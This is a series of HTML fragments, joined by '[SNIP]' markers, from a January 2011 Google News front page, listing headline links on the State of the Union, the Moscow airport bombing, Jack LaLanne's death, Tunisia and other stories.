<a href="/news/section?pz=1&cf=all&ned=us&topic=ss&ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=w&ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&geo=detect_metro_area&ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=n&ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=b&ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=t&ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=e&ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=s&ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=m&ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=ir&ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ " title="MiamiHerald.com"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/naj4TdD_2Xxs5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ "> MiamiHerald... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHqZ10lt7cdruXfdH1xAs6ct4QZGw " href="http://www.miamiherald.com/2011/01/24/2031135/slain-officers-funeral-procession.html?asset_id=Funeral%20procession%20for%20slain%20Miami-Dade%20officers&asset_type=html_module" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://pheedo.msnbc.msn.com/click.phdo?i=ece7dfeabc52f4bea351b7e1dc14b312" target="_blank" class="usg-AFQjCNEPSe4_zvoHTNDJhVHgzRITYChnow " id="MAA4AEgAUAFgAmoCdXM">Police fear 'war on cops' after 11 shootings</a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102430334731152.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNFKWTNERTBMgyBF7SF1954uIaH-5Q " id="MAA4AEgAUAJgAmoCdXM">Photos of the Day</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/northamerica/usa/barackobama/8277266/State-of-the-Union-Barack-Obama-to-use-address-to-rebrand-himself-in-the-centre.html" class="usg-AFQjCNHrsjHtY41Iyj30vk95kj0NTN9hKQ " title="Telegraph.co.uk"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/EQcHoTDMlXOzmM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/northamerica/usa/barackobama/8277266/State-of-the-Union-Barack-Obama-to-use-address-to-rebrand-himself-in-the-centre.html" class="usg-AFQjCNHrsjHtY41Iyj30vk95kj0NTN9hKQ "> Telegraph.c... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNEfe_UP9nwyItWlPbxKT7Wck8XZfQ " href="http://www.cbsnews.com/8301-503544_162-20029390-503544.html" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=pUzMhGLMFgQ">Video: 
Obama to Focus on Economy in Tuesday Address
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2419720820110124" target="_blank" class="usg-AFQjCNH3n7EELgrOBKKQkV-SndbKEp88kw " id="MAA4AEgBUAFgAmoCdXM">US spending battle looms over Obama speech</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHnD8jGZ4-b7iXuMygTSS1YJAV5Iw " href="http://www.bloomberg.com/news/2011-01-22/obama-to-stress-competitiveness-job-creation-deficit-reduction-in-speech.html" id="MAA4AEgBUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHLfCBkbcqp8Q2u9jdOB6Se50Mnsw " href="http://www.oregonlive.com/politics/index.ssf/2011/01/2011_state_of_the_union_-_poli.html" id="MAA4AEgBUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHBUQhvt5D_SvJd1Qiu_F5JfBdEzQ " href="http://www.cnn.com/2011/POLITICS/01/24/obama.word/" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/" class="usg-AFQjCNF4CD2pAreAYNI5YagcDWGJj7WVog " title="Globe and Mail"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/gsPtXlmrvQGLtM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/" class="usg-AFQjCNF4CD2pAreAYNI5YagcDWGJj7WVog "> Globe and M... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNGJtokXRbLsVUlXcHg5zkA1i0nTdg " href="http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=A1JzTAhSoKA">Video: 
Emanuel Has 'No Doubt' He'll Win Ballot Fight
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.csmonitor.com/USA/2011/0124/Rahm-Emanuel-ruling-big-setback-at-a-crucial-time-in-Chicago-mayor-s-race" target="_blank" class="usg-AFQjCNHviaETBQQ4CbFKFWhs-WtpR5QLaA " id="MAA4AEgCUAFgAmoCdXM">Rahm Emanuel ruling: big setback at a crucial time in Chicago mayor's race</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEwKQiOZfU8EiZQoS5g2nyEQ2IkLQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g " href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE9k9pvvHS3M9uwGtHG3nIJ00qnUQ " href="http://www.idahostatejournal.com/news/national/article_4f292c44-2808-11e0-86d1-001cc4c03286.html" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/24/lovie-smith-defends-an-embattled-cutler/" class="usg-AFQjCNEoK7XAsUriosQ-J5zCXObULpccGA " title="New York Times (blog)"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/4Qx6t9NgLfRlrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/24/lovie-smith-defends-an-embattled-cutler/" class="usg-AFQjCNEoK7XAsUriosQ-J5zCXObULpccGA "> New York Ti... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNExCKBurSTO2CpunscBMXRB8AS8rg " href="http://sportsillustrated.cnn.com/2011/writers/paul_daugherty/01/24/jay.cutler/" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://sports.espn.go.com/chicago/nfl/news/story?id=6054809" target="_blank" class="usg-AFQjCNGOcyfxN0x_yhl1C7G2kN9X2Uvebw " id="MAA4AEgDUAFgAmoCdXM">A closer look at Jay Cutler's knee injury</a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1" target="_blank" class="usg-AFQjCNHjzljR480WHVLDV2GFli4gPC1ywg " id="MAA4AEgDUAJgAmoCdXM">Duke's Coach K says Chicago Bears QB Jay Cutler should support team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGk8jkGEv1Mwau1rxJflyTxLLTyLQ " href="http://www.chicagobreakingsports.com/2011/01/bears-cutler-suffers-sprain-of-mcl-in-left-knee.html" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhT_d3vHMRaBJkdkY1C3b7vZZrJg " href="http://profootballtalk.nbcsports.com/2011/01/24/final-cutler-injury-update-grade-ii-mcl-tear/" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGamyU16jAdCMJDs5ZkpwKdiXpkGw " href="http://nbcsports.msnbc.com/id/41239129/ns/sports-player_news/" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2WdPyyjmLcRZK_1AY0NI8Eu5RwA " href="http://www.chicagobreakingsports.com/2011/01/bears-teammates-rally-behind-besieged-cutler.html" id="MAA4AEgDUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA " title="CBC.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/qMklKOy43j6_5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEhLfkwP3KHv_AxKWphB2eFXVLo4w " href="http://www.people.com/people/article/0,,20460315,00.html" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=1wbQ-zmLKqg">Video: 
Oprah Reveals Her Big Family Secret
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://chicago.gopride.com/news/article.cfm/articleid/16138036" target="_blank" class="usg-AFQjCNHLM73pKjVmbSYzUIkwM-YRizRjZA " id="MAA4AEgEUAFgAmoCdXM">Oprah's Big Secret: Ooooo or zzzzzz?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHu4Y7lCPXQJ2lc2u8sbaHH6Tfs7w " href="http://www.businessinsider.com/wow-how-oprahs-half-sister-discovered-they-were-related-2011-1" id="MAA4AEgEUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIUkZzAs9Y61wWQ3duZpRqiJx8Gg " href="http://popwatch.ew.com/2011/01/24/oprah-half-sister-family-secret/" id="MAA4AEgEUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF4hVZx0KyfMaR7DUadFRt5fLq5aA " href="http://theweek.com/article/index/211389/oprahs-half-sister-revelation-a-publicity-stunt" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8lkOCVmQaNBIQdhaM5ui-PusAEw " href="http://www.longislandpress.com/2011/01/24/oprahs-sister-oprahs-half-sister/" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110124/giffords-shooting-case-110124/20110124/?hub=MontrealHome" class="usg-AFQjCNFV1On-T35w6OaTRzPXnDoxdrDZcw " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/T-Xfzw4FP6yhAM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110124/giffords-shooting-case-110124/20110124/?hub=MontrealHome" class="usg-AFQjCNFV1On-T35w6OaTRzPXnDoxdrDZcw "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " id="MAA4AEgFUAFgAmoCdXM">Suspect Pleads Not Guilty in Tucson Shooting</a>
...[SNIP]...
<div class="aa-inner"><a href="http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000" target="_blank" class="usg-AFQjCNHFSESne1W6NZKJuevUCkqaTiP9mg " id="MAA4AEgFUAJgAmoCdXM">Accused Tucson Gunman Jared Loughner Smiles Through Hearing</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNElebFTmOpQ7wKik8gpIXpP1selVQ " href="http://www.9and10news.com/Category/Story/?id=279641&cID=3" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEOK7cyGOy-zN-41xid_LtEjydG4Q " href="http://www.businessweek.com/news/2011-01-24/loughner-pleads-not-guilty-to-attempted-murder-charges.html" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFSXfhjHN0rS0rdJf8PBDheYe6-rQ " href="http://mystateline.com/fulltext-news/?nxd_id=223216" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF-e3D8cBL-34zlHFtAKxTJkVxrjQ " href="http://www.ny1.com/content/news_beats/politics/132719/suspect-in-arizona-shooting-pleads-not-guilty/Default.aspx" id="MAA4AEgFUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ " title="The Guardian"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/sF9Yx43EuUfcmM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ "> The Guardia... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHSXYfXliztkaNWmpZ7jjwek16gxA " href="http://en.rian.ru/russia/20110125/162282705.html" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=90gldve1V1g">Video: 
Medvedev delays Davos trip over 'barbaric' Domodedovo tragedy
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUS198178545820110124" target="_blank" class="usg-AFQjCNGSAB-m5iwTzxGnMuGS88QYOM7ySw " id="MAA4AEgGUAFgAmoCdXM">Breaking News: At Least 35 Dead, 150 Injured in Moscow Airport Explosion</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHWvc5HbfGnAvgPIeDY6BBRSXxwug " href="http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html" id="MAA4AEgGUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHA0iKAZItKHA9EroIoCjTNS4ph1A " href="http://www.msnbc.msn.com/id/41238598/ns/world_news-europe/" id="MAA4AEgGUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFNSZmNow3mU5fl-5uIhKylIg8xhw " href="http://content.usatoday.com/communities/ondeadline/post/2011/01/bbc-at-least-10-killed-in-explosion-at-moscow-airport/1?csp=hf" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG86xUGIkzfiauYZ7t_EAM4mQLkiA " href="http://www.guardian.co.uk/world/2011/jan/24/moscow-airport-bomb-kills-dozens" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA " title="Fox News"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/4MailUtGZpNvBM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHGP9SsjzyW62sRmc_IObJzTshL0g " href="http://www.mercurynews.com/breaking-news/ci_17184991" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Video: 
Fitness Guru Jack LaLanne Dead at 96
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.latimes.com/news/obituaries/la-me-jack-lalanne-20110124,0,6764075.story" target="_blank" class="usg-AFQjCNF2h3Ezfm1HF14DqaqR8JY12OIJCg " id="MAA4AEgHUAFgAmoCdXM">Jack LaLanne dies at 96; spiritual father of US fitness movement</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA " href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" id="MAA4AEgHUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCUvbbz0ZsETsJAmVKDjwuHSZcMQ " href="http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFY9XEVCdovnm3JUC4ZmzWPDVoZqw " href="http://www.catholic.org/ae/celebrity/story.php?id=40071" id="MAA4AEgHUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEUK_ckNba_6O2oIdCyiO_TLZwXwQ " href="http://www.ksby.com/news/locals-work-out-in-honor-of-the-late-fitness-guru-jack-lalanne" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/z55aFPv78aqfWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGf__nmauUuSabbP9kk2SvRT05zrg " href="http://online.wsj.com/article/SB10001424052748704279704576102300534990160.html?mod=googlenews_wsj" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7" target="_blank" class="usg-AFQjCNHXjZjZZ9wZ1CQDlom-nLlng-eGZQ " id="MAA4AEgIUAFgAmoCdXM">Army Leader Guarantees Stability in Tunisia</a>
...[SNIP]...
<div class="aa-inner"><a href="http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/" target="_blank" class="usg-AFQjCNHRMMEdervYw4C3TrR4yaH527g-LA " id="MAA4AEgIUAJgAmoCdXM">Family of deposed Tunisian president reportedly flees to Canada</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGfbz26qP-4kIHs7Cs4zetWEFMGQg " href="http://www.reuters.com/article/idUSTRE70N4AE20110124" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd1p9S1P917IJX6_NsO7fub3yJQg " href="http://allafrica.com/stories/201101242014.html" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHBQ6i08N55rvq2OZdEmGRrU9lJbg " href="http://www.csmonitor.com/World/Middle-East/2011/0124/Tunisia-s-opposition-defends-unity-government-as-pressure-mounts" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIRtGWiZ24XajWlPE7P_ytLx4u3w " href="http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA " title="Zee News"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-ZSVDVOrR4x4PM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA "> Zee News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGE1VkAeO99EDIU5V2VTdJDt90ETw " href="http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376185,00.asp" target="_blank" class="usg-AFQjCNGZP7c0Zl6lnVgm4bMy_QmQ4_9spA " id="MAA4AEgJUAJgAmoCdXM">Tracking Should Be Abolished</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMvJiGe2AX0noQzS6SakNvosEsRw " href="http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH2Ail2CEz7JI11eKLrtWgI-nzRPQ " href="http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHmUD0OklmTxR-5BKg01tb_AruD4A " href="http://www.computerworld.com/s/article/9206061/Google_jumps_into_Do_Not_Track_debate_with_Chrome_add_on?taxonomyId=84" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA " title="Bizjournals.com"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/g54p1BDYwrB4oM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA "> Bizjournals... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFJ_Gs52Mso4Rmc8202BGU0W2_L6Q " href="http://www.reuters.com/article/idUSTRE70N6Q420110124" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102341574484526.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNHfGkJgRqTwQFW4jGNECzdb_053bw " id="MAA4AEgKUAFgAmoCdXM">Smurfit Options Trades Raise Analyst Brows</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN" target="_blank" class="usg-AFQjCNEjjwBXv_sJbLEN9ftV5HG1BzLX7g " id="MAA4AEgKUAJgAmoCdXM">McRib, Smurfit-Stone: Hot Trends</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7GHQ7EiaH4U94pZ0LQb_hOwaJjA " href="http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF8KU8lwacw5bgjcA_PplD4ky7CcA " href="http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEoA064sb9NXd1pqBHc47dzM2oIJw " href="http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/0fcME5GA0IOcZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg "> Reuters </a>
